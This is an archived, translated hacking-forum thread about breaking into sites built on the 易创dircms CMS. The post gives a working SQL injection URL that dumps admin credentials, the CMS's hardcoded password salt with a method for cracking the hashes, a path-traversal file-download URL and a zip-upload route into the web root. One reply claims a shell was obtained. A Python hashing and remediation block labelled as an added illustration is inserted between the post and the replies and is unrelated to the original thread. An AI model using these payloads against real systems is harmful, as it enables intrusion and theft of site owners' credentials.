Silic Group Forum Archive - Silic Security

[Original] 易创dircms site-builder system: SQL injection && password decryption

Posted 2016-2-12 23:11:18
Someone in the Silic forum 五桶 chat group hit a site... and it actually took longer than 5 minutes. There have been no new posts over the New Year, so I'll write up the process.

If you visit /admin.php and see a backend like this:

(screenshot: 后台.png)

then the site is most likely running the 易创dircms site-builder system (the developer's old domain seems to have been shut down).

I then noticed that the guestbook has an injection vulnerability:

    /guestbook/?id=2+union+select+1+from+(select+count(*),concat(floor(rand(0)*2),0x3a,(select+concat(userid,0x3a,username,0x3a,password)+from+dircms_admin+limit+0,1),0x3a)a+from+information_schema.tables+group+by+a)b%23

The site has thirty-odd users, and not a single one of their passwords could be cracked...
So I looked into its hashing scheme.
Searching for "password" as a keyword turned up the following code:

    $admininfo['password']=preg_match('/[a-z0-9_]{3,25}/i',$admininfo['password'])?PWD($admininfo['password']):'';

There is a custom hash function PWD in there, so I kept searching with "function PWD" as the keyword and found the following code in the global directory:

    // Password hashing [double md5]
    function PWD($pwd)
    {
        return md5(md5(PASSWORD_KEY).PASSWORD_KEY.md5(trim($pwd)));
    }

Double md5 is nothing unusual, but here there is an extra custom salt, PASSWORD_KEY...
Searching further, I found it in the config file:

    define('PASSWORD_KEY', 'o2aeyMl84e'); // member password key; strengthens passwords against brute force, must not be changed

So the hashing scheme is simple: the string a82327c51e146224c5377fec2e8c874ao2aeyMl84e + the md5 of the admin password,
then md5 once more. With all the variables stripped out, it is:

    md5('a82327c51e146224c5377fec2e8c874ao2aeyMl84e'.md5($password));

This scheme can be cracked with cmd5 (but after I selected the hash type it kept telling me the ciphertext was wrong - -!).
Actually I ran it with PasswordPro, which you can download from the Silic armory (习科兵器库)...

(screenshot: password.png)

Once you are logged into the backend there are ten thousand ways to get privileges.
Backend plugin templates: an uploaded zip, whether the system reports success or failure, is extracted straight into the web root... There is also a lot of configuration information written in the config file; download a copy of the program and look and you'll see... And if you don't want to download the program to read the code...

    /admin.php?file=db&action=down&filename=../../admin.php

This one should need no explanation... there are just too many problems.
over...
//Silic.Org
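As an added illustration (not the post's code and not dircms's), here is a Python port of the PWD() scheme placed next to a per-user-salted PBKDF2 record and a login routine that re-hashes a legacy record on the owner's first successful login, which is how a site running this CMS could close the weakness the post describes without resetting every password. The PBKDF2 iteration count, the record format, and the sample passwords are assumptions; only PASSWORD_KEY and the PWD() formula come from the post.

```python
import hashlib
import hmac
import os

# Static key quoted from the dircms config file in the post.
PASSWORD_KEY = "o2aeyMl84e"
# Assumed work factor for the replacement scheme (PBKDF2-HMAC-SHA256).
PBKDF2_ITERATIONS = 600_000


def md5_hex(s):
    return hashlib.md5(s.encode("utf-8")).hexdigest()

def legacy_pwd(pwd):
    """Python port of dircms PWD(): md5(md5(KEY) . KEY . md5(trim(pwd)))."""
    return md5_hex(md5_hex(PASSWORD_KEY) + PASSWORD_KEY + md5_hex(pwd.strip()))

def modern_hash(pwd, salt=None):
    """Per-user random salt and a slow KDF, stored in a self-describing record."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", pwd.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (PBKDF2_ITERATIONS, salt.hex(), dk.hex())

def verify(pwd, stored):
    """Accepts either record type; constant-time comparison in both branches."""
    if stored.startswith("pbkdf2_sha256$"):
        _, iters, salt_hex, dk_hex = stored.split("$")
        dk = hashlib.pbkdf2_hmac("sha256", pwd.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iters))
        return hmac.compare_digest(dk.hex(), dk_hex)
    # Any other record is treated as a 32-hex legacy PWD() hash.
    return hmac.compare_digest(legacy_pwd(pwd), stored)

def login(pwd, stored):
    """Returns (accepted, record_to_store). A legacy record is upgraded on the
    first successful login, the only moment the server holds the plaintext."""
    if not verify(pwd, stored):
        return False, stored
    if stored.startswith("pbkdf2_sha256$"):
        return True, stored
    return True, modern_hash(pwd)


if __name__ == "__main__":
    # Constructed sample: two admins who happened to pick the same password.
    a, b = legacy_pwd("Winter2016"), legacy_pwd("Winter2016")
    print("legacy hashes identical (static salt):", a == b)
    ok, a2 = login("Winter2016", a)
    ok, b2 = login("Winter2016", b)
    print("upgraded records differ (per-user salt):", a2 != b2)
```

Because the legacy salt is a single site-wide constant, every dircms install that keeps the shipped PASSWORD_KEY produces identical hashes for identical passwords, which is why the post could treat the scheme as a fixed prefix plus md5 of the password.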
CMSteam The user has been deleted
Posted 2016-2-12 23:13:37
Indeed,, boss, give me a few more coins

flowstone The user has been deleted
Posted 2016-2-12 23:17:18
Boss, awesome...

圣路西法 The user has been deleted
Posted 2016-2-12 23:29:15
This process is worth studying.

mynccs The user has been deleted
Posted 2016-2-13 07:57:51
Good approach, worth learning.

枫叶 The user has been deleted
Posted 2016-2-13 11:09:50
I just couldn't make sense of that injection statement.

Shrek The user has been deleted
Posted 2016-2-13 16:07:30
A bit deep; this newbie can't follow it.

流弊的小牛 The user has been deleted
Posted 2016-2-13 16:44:38
I've already got a shell, learned a lot, boss.

four The user has been deleted
Posted 2016-2-14 12:29:56
Studied, verdict rendered.

annabelle The user has been deleted
Posted 2016-2-16 14:03:53
I hate sites like this the most: someone develops a CMS and then shuts down. A pain to break into, and a headache for the webmasters who use it.

Kav The user has been deleted
Posted 2016-2-17 11:11:55
I just couldn't make sense of that injection statement.

完美剿灭OVG The user has been deleted
Posted 2016-2-23 10:25:00
Can I ask how to handle 师说CMS?

Star The user has been deleted
Posted 2016-5-21 18:11:40
Boss, I remember there used to be a thread about paying 飞币 to buy invitation codes to invite people, but I can't find it. I even paid 50 of my own on top of the 飞币 you gave me to buy codes for people who genuinely love the technology and want to join Silic. Now I'm running low on 飞币 and have met a few more who want to join, so please grant me enough coins to buy 5 codes! Thanks!

竹影幽灵 The user has been deleted
Posted 2016-7-1 10:19:05
Learned a trick.

1669178846 The user has been deleted
Posted 2016-7-7 09:59:04
Good approach, bookmarked.